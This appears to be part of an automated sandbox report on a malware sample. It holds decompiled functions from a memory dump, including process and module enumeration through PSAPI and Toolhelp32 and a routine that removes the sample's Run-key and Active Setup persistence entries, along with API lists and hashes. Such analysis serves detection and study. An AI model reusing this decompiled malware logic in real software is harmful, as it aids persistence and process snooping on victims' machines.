				unsigned int _t127;
				unsigned int _t130;
				unsigned int _t133;
				void* _t137;
				signed char _t138;
				signed int* _t139;
				signed int* _t140;
				signed int* _t141;
				signed int* _t142;
				signed int* _t143;
				signed int* _t144;
				signed int* _t145;
				signed int _t148;
				signed int _t154;
				signed int _t160;
				signed int _t166;
				signed int _t172;
				signed int _t178;
				signed int _t184;
				signed int _t190;
				signed int _t196;
				signed int _t202;
				signed int _t206;
				signed int _t212;
				signed int _t218;
				signed int _t224;
				signed int _t230;
				signed int _t236;
				signed int _t242;
				signed int _t248;
				signed int _t254;
				signed int _t260;

				_t138 = __edx;
				_t137 = __ecx;
				_t107 =  !__eax;
				while(_t137 != 0 && (_t138 & 0x00000003) != 0) {
					_t260 =  *_t138 & 0x000000ff ^ _t107;
					_t138 = _t138 + 1;
					_t137 = _t137 - 1;
					_t107 =  *(0x24058a24 + (_t260 & 0x000000ff) * 4) ^ _t107 >> 0x00000008;
				}
				while(_t137 >= 0x20) {
					_t112 = _t107 ^  *_t138;
					_t139 = _t138 + 4;
					_t212 = _t112 & 0x000000ff;
					_t154 = _t112 >> 0x00000008 & 0x000000ff;
					_t6 = _t212 * 4; // 0x0
					_t9 = _t154 * 4; // 0x0
					_t12 = (_t112 >> 0x00000010 & 0x000000ff) * 4; // 0x0
					_t115 =  *(0x24058a24 + _t6 + 0xc00) ^  *(0x24058a24 + _t9 + 0x800) ^  *(0x24058a24 + _t12 + 0x400) ^  *(0x24058a24 + (_t112 >> 0x18) * 4) ^  *_t139;
					_t140 =  &(_t139[1]);
					_t218 = _t115 & 0x000000ff;
					_t160 = _t115 >> 0x00000008 & 0x000000ff;
					_t17 = _t218 * 4; // 0x0
					_t20 = _t160 * 4; // 0x0
					_t23 = (_t115 >> 0x00000010 & 0x000000ff) * 4; // 0x0
					_t118 =  *(0x24058a24 + _t17 + 0xc00) ^  *(0x24058a24 + _t20 + 0x800) ^  *(0x24058a24 + _t23 + 0x400) ^  *(0x24058a24 + (_t115 >> 0x18) * 4) ^  *_t140;
					_t141 =  &(_t140[1]);
					_t224 = _t118 & 0x000000ff;
					_t166 = _t118 >> 0x00000008 & 0x000000ff;
					_t28 = _t224 * 4; // 0x0
					_t31 = _t166 * 4; // 0x0
					_t34 = (_t118 >> 0x00000010 & 0x000000ff) * 4; // 0x0
					_t121 =  *(0x24058a24 + _t28 + 0xc00) ^  *(0x24058a24 + _t31 + 0x800) ^  *(0x24058a24 + _t34 + 0x400) ^  *(0x24058a24 + (_t118 >> 0x18) * 4) ^  *_t141;
					_t142 =  &(_t141[1]);
					_t230 = _t121 & 0x000000ff;
					_t172 = _t121 >> 0x00000008 & 0x000000ff;
					_t39 = _t230 * 4; // 0x0
					_t42 = _t172 * 4; // 0x0
					_t45 = (_t121 >> 0x00000010 & 0x000000ff) * 4; // 0x0
					_t124 =  *(0x24058a24 + _t39 + 0xc00) ^  *(0x24058a24 + _t42 + 0x800) ^  *(0x24058a24 + _t45 + 0x400) ^  *(0x24058a24 + (_t121 >> 0x18) * 4) ^  *_t142;
					_t143 =  &(_t142[1]);
					_t236 = _t124 & 0x000000ff;
					_t178 = _t124 >> 0x00000008 & 0x000000ff;
					_t50 = _t236 * 4; // 0x0
					_t53 = _t178 * 4; // 0x0
					_t56 = (_t124 >> 0x00000010 & 0x000000ff) * 4; // 0x0
					_t127 =  *(0x24058a24 + _t50 + 0xc00) ^  *(0x24058a24 + _t53 + 0x800) ^  *(0x24058a24 + _t56 + 0x400) ^  *(0x24058a24 + (_t124 >> 0x18) * 4) ^  *_t143;
					_t144 =  &(_t143[1]);
					_t242 = _t127 & 0x000000ff;
					_t184 = _t127 >> 0x00000008 & 0x000000ff;
					_t61 = _t242 * 4; // 0x0
					_t64 = _t184 * 4; // 0x0
					_t67 = (_t127 >> 0x00000010 & 0x000000ff) * 4; // 0x0
					_t130 =  *(0x24058a24 + _t61 + 0xc00) ^  *(0x24058a24 + _t64 + 0x800) ^  *(0x24058a24 + _t67 + 0x400) ^  *(0x24058a24 + (_t127 >> 0x18) * 4) ^  *_t144;
					_t145 =  &(_t144[1]);
					_t248 = _t130 & 0x000000ff;
					_t190 = _t130 >> 0x00000008 & 0x000000ff;
					_t72 = _t248 * 4; // 0x0
					_t75 = _t190 * 4; // 0x0
					_t78 = (_t130 >> 0x00000010 & 0x000000ff) * 4; // 0x0
					_t133 =  *(0x24058a24 + _t72 + 0xc00) ^  *(0x24058a24 + _t75 + 0x800) ^  *(0x24058a24 + _t78 + 0x400) ^  *(0x24058a24 + (_t130 >> 0x18) * 4) ^  *_t145;
					_t138 =  &(_t145[1]);
					_t254 = _t133 & 0x000000ff;
					_t196 = _t133 >> 0x00000008 & 0x000000ff;
					_t83 = _t254 * 4; // 0x0
					_t86 = _t196 * 4; // 0x0
					_t89 = (_t133 >> 0x00000010 & 0x000000ff) * 4; // 0x0
					_t137 = _t137 - 0x20;
					_t107 =  *(0x24058a24 + _t83 + 0xc00) ^  *(0x24058a24 + _t86 + 0x800) ^  *(0x24058a24 + _t89 + 0x400) ^  *(0x24058a24 + (_t133 >> 0x18) * 4);
				}
				while(_t137 >= 4) {
					_t110 = _t107 ^  *_t138;
					_t138 = _t138 + 4;
					_t206 = _t110 & 0x000000ff;
					_t148 = _t110 >> 0x00000008 & 0x000000ff;
					_t94 = _t206 * 4; // 0x0
					_t97 = _t148 * 4; // 0x0
					_t100 = (_t110 >> 0x00000010 & 0x000000ff) * 4; // 0x0
					_t137 = _t137 - 4;
					_t107 =  *(0x24058a24 + _t94 + 0xc00) ^  *(0x24058a24 + _t97 + 0x800) ^  *(0x24058a24 + _t100 + 0x400) ^  *(0x24058a24 + (_t110 >> 0x18) * 4);
				}
				if(_t137 != 0) {
					do {
						_t202 = ( *_t138 & 0x000000ff ^ _t107) & 0x000000ff;
						_t138 = _t138 + 1;
						_t107 =  *(0x24058a24 + _t202 * 4) ^ _t107 >> 0x00000008;
						_t137 = _t137 - 1;
					} while (_t137 != 0);
				}
				return  !_t107;
			}










































                                    0x24035970
                                    0x24035970
                                    0x24035978
                                    0x24035993
                                    0x2403597f
                                    0x24035981
                                    0x24035990
                                    0x24035991
                                    0x24035991
                                    0x2403599f
                                    0x240359a5
                                    0x240359a7
                                    0x240359b1
                                    0x240359b7
                                    0x240359bd
                                    0x240359c4
                                    0x240359d9
                                    0x240359e5
                                    0x240359e7
                                    0x240359f1
                                    0x240359f7
                                    0x240359fd
                                    0x24035a04
                                    0x24035a19
                                    0x24035a25
                                    0x24035a27
                                    0x24035a31
                                    0x24035a37
                                    0x24035a3d
                                    0x24035a44
                                    0x24035a59
                                    0x24035a65
                                    0x24035a67
                                    0x24035a71
                                    0x24035a77
                                    0x24035a7d
                                    0x24035a84
                                    0x24035a99
                                    0x24035aa5
                                    0x24035aa7
                                    0x24035ab1
                                    0x24035ab7
                                    0x24035abd
                                    0x24035ac4
                                    0x24035ad9
                                    0x24035ae5
                                    0x24035ae7
                                    0x24035af1
                                    0x24035af7
                                    0x24035afd
                                    0x24035b04
                                    0x24035b19
                                    0x24035b25
                                    0x24035b27
                                    0x24035b31
                                    0x24035b37
                                    0x24035b3d
                                    0x24035b44
                                    0x24035b59
                                    0x24035b65
                                    0x24035b67
                                    0x24035b71
                                    0x24035b77
                                    0x24035b7d
                                    0x24035b84
                                    0x24035b99
                                    0x24035ba3
                                    0x24035ba6
                                    0x24035ba8
                                    0x24035bb4
                                    0x24035bb6
                                    0x24035bb8
                                    0x24035bc2
                                    0x24035bc8
                                    0x24035bce
                                    0x24035bd5
                                    0x24035bea
                                    0x24035bf4
                                    0x24035bf7
                                    0x24035bf9
                                    0x24035c00
                                    0x24035c02
                                    0x24035c07
                                    0x24035c15
                                    0x24035c16
                                    0x24035c18
                                    0x24035c18
                                    0x24035c02
                                    0x24035c20

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 619597ac5c60795fb4c4f482cd48e8a4deb11bc390405c7789798b2838109db3
                                    • Instruction ID: 4025fb110d6d374878c9738f5267b3f385e9db90dfb0f35894ebf346fe4b9e84
                                    • Opcode Fuzzy Hash: 619597ac5c60795fb4c4f482cd48e8a4deb11bc390405c7789798b2838109db3
                                    • Instruction Fuzzy Hash: FB712873D214779BEB608EA8C8443617392EFC921CF6B46B0DE05BB646C634BD5296D0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2401544E, Relevance: .0, Instructions: 2COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2401544E() {

				goto ( *0x2406449c);
			}



                                    0x24015450

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5a4504d12df21fadabd26575d1ba31d84357f6890d4c8850351233ff21e7c565
                                    • Instruction ID: 5fc67294772d053e76106f30a5e04b0145d0243dfd3a6eec38c209d5f2cc8dc6
                                    • Opcode Fuzzy Hash: 5a4504d12df21fadabd26575d1ba31d84357f6890d4c8850351233ff21e7c565
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2401528E, Relevance: .0, Instructions: 2COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2401528E() {

				goto ( *0x2406457c);
			}



                                    0x24015290

                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8563cc2b62b4566382a34513e251ee5164fcfe06a5e91d5372afb1e6b59fd56c
                                    • Instruction ID: ca9d780cdcaf49222eb9e69980436e315a9c9644ea773c47ee1a75ad75f8d7e1
                                    • Opcode Fuzzy Hash: 8563cc2b62b4566382a34513e251ee5164fcfe06a5e91d5372afb1e6b59fd56c
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 2403BD34, Relevance: 75.4, APIs: 24, Strings: 19, Instructions: 132libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E2403BD34() {

				if( *0x2405cacc != 0) {
					L4:
					return 1;
				} else {
					 *0x2405cacc = LoadLibraryA("PSAPI.dll");
					if( *0x2405cacc >= 0x20) {
						 *0x2405cad0 = GetProcAddress( *0x2405cacc, "EnumProcesses");
						 *0x2405cad4 = GetProcAddress( *0x2405cacc, "EnumProcessModules");
						 *0x2405cad8 = GetProcAddress( *0x2405cacc, "GetModuleBaseNameA");
						 *0x2405cadc = GetProcAddress( *0x2405cacc, "GetModuleFileNameExA");
						 *0x2405cae0 = GetProcAddress( *0x2405cacc, "GetModuleBaseNameA");
						 *0x2405cae4 = GetProcAddress( *0x2405cacc, "GetModuleFileNameExA");
						 *0x2405cae8 = GetProcAddress( *0x2405cacc, "GetModuleBaseNameW");
						 *0x2405caec = GetProcAddress( *0x2405cacc, "GetModuleFileNameExW");
						 *0x2405caf0 = GetProcAddress( *0x2405cacc, "GetModuleInformation");
						 *0x2405caf4 = GetProcAddress( *0x2405cacc, "EmptyWorkingSet");
						 *0x2405caf8 = GetProcAddress( *0x2405cacc, "QueryWorkingSet");
						 *0x2405cafc = GetProcAddress( *0x2405cacc, "InitializeProcessForWsWatch");
						 *0x2405cb00 = GetProcAddress( *0x2405cacc, "GetMappedFileNameA");
						 *0x2405cb04 = GetProcAddress( *0x2405cacc, "GetDeviceDriverBaseNameA");
						 *0x2405cb08 = GetProcAddress( *0x2405cacc, "GetDeviceDriverFileNameA");
						 *0x2405cb0c = GetProcAddress( *0x2405cacc, "GetMappedFileNameA");
						 *0x2405cb10 = GetProcAddress( *0x2405cacc, "GetDeviceDriverBaseNameA");
						 *0x2405cb14 = GetProcAddress( *0x2405cacc, "GetDeviceDriverFileNameA");
						 *0x2405cb18 = GetProcAddress( *0x2405cacc, "GetMappedFileNameW");
						 *0x2405cb1c = GetProcAddress( *0x2405cacc, "GetDeviceDriverBaseNameW");
						 *0x2405cb20 = GetProcAddress( *0x2405cacc, "GetDeviceDriverFileNameW");
						 *0x2405cb24 = GetProcAddress( *0x2405cacc, "EnumDeviceDrivers");
						 *0x2405cb28 = GetProcAddress( *0x2405cacc, "GetProcessMemoryInfo");
						goto L4;
					} else {
						 *0x2405cacc = 0;
						return 0;
					}
				}
			}



                                    0x2403bd3d
                                    0x2403befa
                                    0x2403befd
                                    0x2403bd43
                                    0x2403bd4d
                                    0x2403bd52
                                    0x2403bd69
                                    0x2403bd7b
                                    0x2403bd8d
                                    0x2403bd9f
                                    0x2403bdb1
                                    0x2403bdc3
                                    0x2403bdd5
                                    0x2403bde7
                                    0x2403bdf9
                                    0x2403be0b
                                    0x2403be1d
                                    0x2403be2f
                                    0x2403be41
                                    0x2403be53
                                    0x2403be65
                                    0x2403be77
                                    0x2403be89
                                    0x2403be9b
                                    0x2403bead
                                    0x2403bebf
                                    0x2403bed1
                                    0x2403bee3
                                    0x2403bef5
                                    0x00000000
                                    0x2403bd54
                                    0x2403bd56
                                    0x2403bd5b
                                    0x2403bd5b
                                    0x2403bd52

                                    APIs
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,?,2403C0D5), ref: 2403BD48
                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 2403BD64
                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 2403BD76
                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 2403BD88
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 2403BD9A
                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 2403BDAC
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 2403BDBE
                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 2403BDD0
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 2403BDE2
                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 2403BDF4
                                    • GetProcAddress.KERNEL32(00000000,EmptyWorkingSet), ref: 2403BE06
                                    • GetProcAddress.KERNEL32(00000000,QueryWorkingSet), ref: 2403BE18
                                    • GetProcAddress.KERNEL32(00000000,InitializeProcessForWsWatch), ref: 2403BE2A
                                    • GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 2403BE3C
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 2403BE4E
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 2403BE60
                                    • GetProcAddress.KERNEL32(00000000,GetMappedFileNameA), ref: 2403BE72
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameA), ref: 2403BE84
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverFileNameA), ref: 2403BE96
                                    • GetProcAddress.KERNEL32(00000000,GetMappedFileNameW), ref: 2403BEA8
                                    • GetProcAddress.KERNEL32(00000000,GetDeviceDriverBaseNameW), ref: 2403BEBA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: EmptyWorkingSet$EnumDeviceDrivers$EnumProcessModules$EnumProcesses$GetDeviceDriverBaseNameA$GetDeviceDriverBaseNameW$GetDeviceDriverFileNameA$GetDeviceDriverFileNameW$GetMappedFileNameA$GetMappedFileNameW$GetModuleBaseNameA$GetModuleBaseNameW$GetModuleFileNameExA$GetModuleFileNameExW$GetModuleInformation$GetProcessMemoryInfo$InitializeProcessForWsWatch$PSAPI.dll$QueryWorkingSet
                                    • API String ID: 2238633743-2267155864
                                    • Opcode ID: 8f5bc80e15c7e2906b0eea499438a1141eafc75c87cc3d95cbb3401759216367
                                    • Instruction ID: d3cdc4a8aa122c4895603ab0ff11bca53f3cfd594fe5426d88abbaad1c9b5486
                                    • Opcode Fuzzy Hash: 8f5bc80e15c7e2906b0eea499438a1141eafc75c87cc3d95cbb3401759216367
                                    • Instruction Fuzzy Hash: 04417FB1914610AFEB01EFB9C8D4F2A3FA8FB162487401569F404EF64DD639DAC49F92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24015564, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E24015564() {

				if( *0x2405b698 == 0) {
					 *0x2405b698 = GetModuleHandleA("kernel32.dll");
					if( *0x2405b698 != 0) {
						 *0x2405b69c = GetProcAddress( *0x2405b698, "CreateToolhelp32Snapshot");
						 *0x2405b6a0 = GetProcAddress( *0x2405b698, "Heap32ListFirst");
						 *0x2405b6a4 = GetProcAddress( *0x2405b698, "Heap32ListNext");
						 *0x2405b6a8 = GetProcAddress( *0x2405b698, "Heap32First");
						 *0x2405b6ac = GetProcAddress( *0x2405b698, "Heap32Next");
						 *0x2405b6b0 = GetProcAddress( *0x2405b698, "Toolhelp32ReadProcessMemory");
						 *0x2405b6b4 = GetProcAddress( *0x2405b698, "Process32First");
						 *0x2405b6b8 = GetProcAddress( *0x2405b698, "Process32Next");
						 *0x2405b6bc = GetProcAddress( *0x2405b698, "Process32FirstW");
						 *0x2405b6c0 = GetProcAddress( *0x2405b698, "Process32NextW");
						 *0x2405b6c4 = GetProcAddress( *0x2405b698, "Thread32First");
						 *0x2405b6c8 = GetProcAddress( *0x2405b698, "Thread32Next");
						 *0x2405b6cc = GetProcAddress( *0x2405b698, "Module32First");
						 *0x2405b6d0 = GetProcAddress( *0x2405b698, "Module32Next");
						 *0x2405b6d4 = GetProcAddress( *0x2405b698, "Module32FirstW");
						 *0x2405b6d8 = GetProcAddress( *0x2405b698, "Module32NextW");
					}
				}
				if( *0x2405b698 == 0 ||  *0x2405b69c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                    0x2401556d
                                    0x2401557d
                                    0x24015582
                                    0x24015595
                                    0x240155a7
                                    0x240155b9
                                    0x240155cb
                                    0x240155dd
                                    0x240155ef
                                    0x24015601
                                    0x24015613
                                    0x24015625
                                    0x24015637
                                    0x24015649
                                    0x2401565b
                                    0x2401566d
                                    0x2401567f
                                    0x24015691
                                    0x240156a3
                                    0x240156a3
                                    0x24015582
                                    0x240156ab
                                    0x240156b9
                                    0x240156ba
                                    0x240156bd
                                    0x240156bd

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,240157EB,?,?,2402E487), ref: 24015578
                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 24015590
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 240155A2
                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 240155B4
                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 240155C6
                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 240155D8
                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 240155EA
                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 240155FC
                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 2401560E
                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 24015620
                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 24015632
                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 24015644
                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 24015656
                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 24015668
                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 2401567A
                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 2401568C
                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 2401569E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp Download File
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                    • API String ID: 667068680-597814768
                                    • Opcode ID: a47529a7dc0de6d09de47caf561174e7674bd0a321a707ba09a43ba927510138
                                    • Instruction ID: bdc3c3d6c9dac89747669548f5dd8aa332930fedcc04540d8a61342f969d8403
                                    • Opcode Fuzzy Hash: a47529a7dc0de6d09de47caf561174e7674bd0a321a707ba09a43ba927510138
                                    • Instruction Fuzzy Hash: CB3128F49116109FEB029FB9D8D5F2D3AB9FF162447800565F408EF248D639AAC48F95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 24044638, Relevance: 54.4, APIs: 25, Strings: 6, Instructions: 181registrysleepCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E24044638(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t12;
				void** _t13;
				void** _t16;
				intOrPtr* _t19;
				intOrPtr* _t25;
				intOrPtr* _t28;
				intOrPtr* _t29;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr* _t33;
				intOrPtr* _t44;
				intOrPtr* _t52;
				intOrPtr* _t60;
				intOrPtr* _t68;
				intOrPtr* _t76;
				intOrPtr* _t84;
				void** _t97;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr _t105;
				void* _t107;
				void* _t108;
				intOrPtr _t111;

				_t108 = __esi;
				_t107 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_t97 =  &_v8;
				_push(_t111);
				_push(0x24044885);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				_t101 =  *0x2405ac14; // 0x2405b94c
				E24013388( &_v12, 0x2404489c,  *_t101);
				_t12 = E24014F18(0, 0, E24013534(_v12));
				_t103 =  *0x2405abe4; // 0x2405b998
				 *_t103 = _t12;
				_t113 =  *0x2405aa88;
				if( *0x2405aa88 != 0) {
					E24037CD4(0x240448ac, _t113);
					Sleep(0x64);
					E24037CD4(0, _t113);
					 *0x2405aa88 = 0;
				}
				_t13 =  *0x2405ac18; // 0x240570d8
				CloseHandle( *_t13);
				_t16 =  *0x2405ab38; // 0x2405b990
				CloseHandle( *_t16);
				_t19 =  *0x2405ac24; // 0x2405b980
				E24016588( *_t19, _t97,  &_v16, _t107, _t108, 0);
				SetFileAttributesA(E24013534(_v16), 0x80);
				_t25 =  *0x2405ab24; // 0x240632f0
				E24016634( *_t25, _t97, _t107, _t108, 0);
				_t28 =  *0x2405ab5c; // 0x2405b8f8
				if( *_t28 != 0) {
					RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t97);
					_t84 =  *0x2405ab5c; // 0x2405b8f8
					RegDeleteValueA( *_t97, E24013534( *_t84));
					RegCloseKey( *_t97);
				}
				_t29 =  *0x2405ab88; // 0x2405b8fc
				if( *_t29 != 0) {
					RegOpenKeyA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t97);
					_t76 =  *0x2405ab88; // 0x2405b8fc
					RegDeleteValueA( *_t97, E24013534( *_t76));
					RegCloseKey( *_t97);
				}
				_t30 =  *0x2405abd0; // 0x2405b900
				if( *_t30 != 0) {
					RegOpenKeyA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t97);
					_t60 =  *0x2405abd0; // 0x2405b900
					RegDeleteValueA( *_t97, E24013534( *_t60));
					RegCloseKey( *_t97);
					RegOpenKeyA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t97);
					_t68 =  *0x2405abd0; // 0x2405b900
					RegDeleteValueA( *_t97, E24013534( *_t68));
					RegCloseKey( *_t97);
				}
				_t31 =  *0x2405ab8c; // 0x2405b8f4
				if( *_t31 != 0) {
					RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t97);
					_t44 =  *0x2405ab8c; // 0x2405b8f4
					RegDeleteKeyA( *_t97, E24013534( *_t44));
					RegCloseKey( *_t97);
					RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, _t97);
					_t52 =  *0x2405ab8c; // 0x2405b8f4
					RegDeleteKeyA( *_t97, E24013534( *_t52));
					RegCloseKey( *_t97);
				}
				RegOpenKeyExA(0x80000001, "Software\\", 0, 0x20006, _t97);
				_t33 =  *0x2405aba4; // 0x2405b8d8
				RegDeleteKeyA( *_t97, E24013534( *_t33));
				RegCloseKey( *_t97);
				_pop(_t105);
				 *[fs:eax] = _t105;
				_push(0x2404488c);
				return E240130AC( &_v16, 2);
			}





























                                    0x24044638
                                    0x24044638
                                    0x2404463b
                                    0x2404463d
                                    0x2404463f
                                    0x24044642
                                    0x24044647
                                    0x24044648
                                    0x2404464d
                                    0x24044650
                                    0x24044653
                                    0x24044663
                                    0x24044675
                                    0x2404467a
                                    0x24044680
                                    0x24044682
                                    0x24044689
                                    0x24044690
                                    0x24044697
                                    0x2404469e
                                    0x240446a5
                                    0x240446a5
                                    0x240446aa
                                    0x240446b2
                                    0x240446b7
                                    0x240446bf
                                    0x240446cc
                                    0x240446d3
                                    0x240446e1
                                    0x240446e6
                                    0x240446ed
                                    0x240446f2
                                    0x240446fa
                                    0x24044707
                                    0x2404470c
                                    0x2404471c
                                    0x24044724
                                    0x24044724
                                    0x24044729
                                    0x24044731
                                    0x2404473e
                                    0x24044743
                                    0x24044753
                                    0x2404475b
                                    0x2404475b
                                    0x24044760
                                    0x24044768
                                    0x24044775
                                    0x2404477a
                                    0x2404478a
                                    0x24044792
                                    0x240447a2
                                    0x240447a7
                                    0x240447b7
                                    0x240447bf
                                    0x240447bf
                                    0x240447c4
                                    0x240447cc
                                    0x240447e0
                                    0x240447e5
                                    0x240447f5
                                    0x240447fd
                                    0x24044814
                                    0x24044819
                                    0x24044829
                                    0x24044831
                                    0x24044831
                                    0x24044848
                                    0x2404484d
                                    0x2404485d
                                    0x24044865
                                    0x2404486c
                                    0x2404486f
                                    0x24044872
                                    0x24044884

                                    APIs
                                      • Part of subcall function 24014F18: CreateMutexA.KERNEL32(?,?,?,?,24038D32,00000000,00000000,00000000,00000000,?,00001388,?,24038DFC,?,24038DFC,?), ref: 24014F2E
                                    • Sleep.KERNEL32(00000064,00000000,00000000,00000000,00000000,24044885,?,?,00000000,00000000,00000000), ref: 24044697
                                    • CloseHandle.KERNEL32(00000480,00000000,00000000,00000000,00000000,24044885,?,?,00000000,00000000,00000000), ref: 240446B2
                                    • CloseHandle.KERNEL32(0000044C,00000480,00000000,00000000,00000000,00000000,24044885,?,?,00000000,00000000,00000000), ref: 240446BF
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885,?,?,00000000,00000000,00000000), ref: 240446E1
                                    • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 24044707
                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 2404471C
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000002,Software\Microsoft\Windows\CurrentVersion\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 24044724
                                    • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 2404473E
                                    • RegDeleteValueA.ADVAPI32(00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 24044753
                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000000,80000001,Software\Microsoft\Windows\CurrentVersion\Run,?,00000000,00000080,0000044C,00000480,00000000,00000000,00000000,00000000,24044885), ref: 2404475B
                                    • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,?), ref: 24044775
